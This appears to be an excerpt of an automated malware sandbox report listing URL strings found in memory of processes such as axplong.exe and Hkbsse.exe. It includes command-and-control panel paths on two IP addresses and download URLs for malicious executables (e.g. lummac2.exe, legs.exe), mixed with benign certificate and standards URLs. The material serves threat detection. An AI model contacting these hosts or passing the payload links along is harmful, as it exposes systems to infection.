Source: Hkbsse.exe, 0000000B.00000003.4163886975.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpU
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpa
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4163886975.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcoded
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcodedB
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcodedH
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4163886975.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcodedZ
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpd
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpded
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpexW
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpff913c5fc0b879a0d56e06te
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpncoded:
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phps
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpy
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php~A
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/NewLatest.exe
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/a
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/
Source: axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php
Source: axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php)
Source: axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php.d
Source: axplong.exe, 00000002.00000002.4499726600.0000000005B7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php2
Source: axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php3yd
Source: axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php5
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php7
Source: axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php9
Source: axplong.exe, 00000002.00000002.4499726600.0000000005B7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php94001
Source: axplong.exe, 00000002.00000002.4499726600.0000000005B7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php?
Source: axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpY
Source: axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpc
Source: axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpfG1
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpgd
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpld
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phps
Source: axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpt
Source: axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phptch
Source: axplong.exe, 00000002.00000002.4492544980.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/ama.exew
Source: axplong.exe, 00000002.00000002.4492544980.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/ama.exe~
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/gold.exe
Source: axplong.exe, 00000002.00000002.4499726600.0000000005B7F000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/legs.exeZ
Source: axplong.exe, 00000002.00000002.4499726600.0000000005B7F000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/legs.exev-
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/lummac2.exeI4
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/lummac2.exeW4f0%
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/taskweaker.exeMd
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/taskweaker.exeqe
Source: svchost.exe, 0000001D.00000003.4215142468.0000018F5BD60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325522371.0000018F5BD7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215894664.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216514294.0000018F5BD0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216863057.0000018F5BD72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216745370.0000018F5BD70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217239481.0000018F5BD74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000001D.00000003.2352369386.0000018F5BD96000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325522371.0000018F5BD7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2306163202.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2391820959.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215209029.0000018F5BD37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352369386.0000018F5BD9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2413467060.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000001D.00000002.4224343351.0000018F5C239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4219288732.0000018F5B49B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000001D.00000002.4225383542.0000018F5C278000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4220285204.0000018F5B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4224343351.0000018F5C251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: ama.exe, 00000004.00000002.2393678580.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: svchost.exe, 0000001C.00000002.2331519432.0000019C9FC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221015454.0000018F5B4D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 0000001D.00000003.4215894664.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216514294.0000018F5BD0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: svchost.exe, 0000001D.00000003.2413945250.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221015454.0000018F5B4D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392391425.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
Source: svchost.exe, 0000001D.00000003.2379195931.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392391425.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 0000001D.00000003.2306077951.0000018F5BD10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2303736884.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338631678.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2305053313.0000018F5BD0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338678313.0000018F5BD10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338379077.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215894664.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216514294.0000018F5BD0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2324470767.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2303885597.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352450967.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2303761347.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352067754.0000018F5BD0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352040528.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216591284.0000018F5BD10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352124454.0000018F5BD0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdle
Source: svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdo0zjQ
Source: svchost.exe, 0000001D.00000003.2273862826.0000018F5BD55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdoap.or
Source: svchost.exe, 0000001D.00000003.2324470767.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdtil
Source: svchost.exe, 0000001D.00000003.2324863832.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392391425.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd8F0U
Source: svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 0000001D.00000003.2325214104.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdTra
Source: svchost.exe, 0000001D.00000003.2325214104.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdatu
Source: svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdcLPe
Source: svchost.exe, 0000001D.00000003.2325214104.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdg/20
Source: svchost.exe, 0000001D.00000003.2303736884.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdp&
Source: svchost.exe, 0000001D.00000003.4217052662.0000018F5BD7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392227835.0000018F5BD7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2413945250.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 0000001D.00000003.2273862826.0000018F5BD55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdse=
Source: svchost.exe, 0000001D.00000003.2306077951.0000018F5BD10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2303736884.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338631678.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2305053313.0000018F5BD0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338678313.0000018F5BD10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338379077.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215894664.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216514294.0000018F5BD0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2324470767.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2303885597.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352450967.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2303761347.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352067754.0000018F5BD0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352040528.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216591284.0000018F5BD10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352124454.0000018F5BD0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.28.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://moreapp4you.online
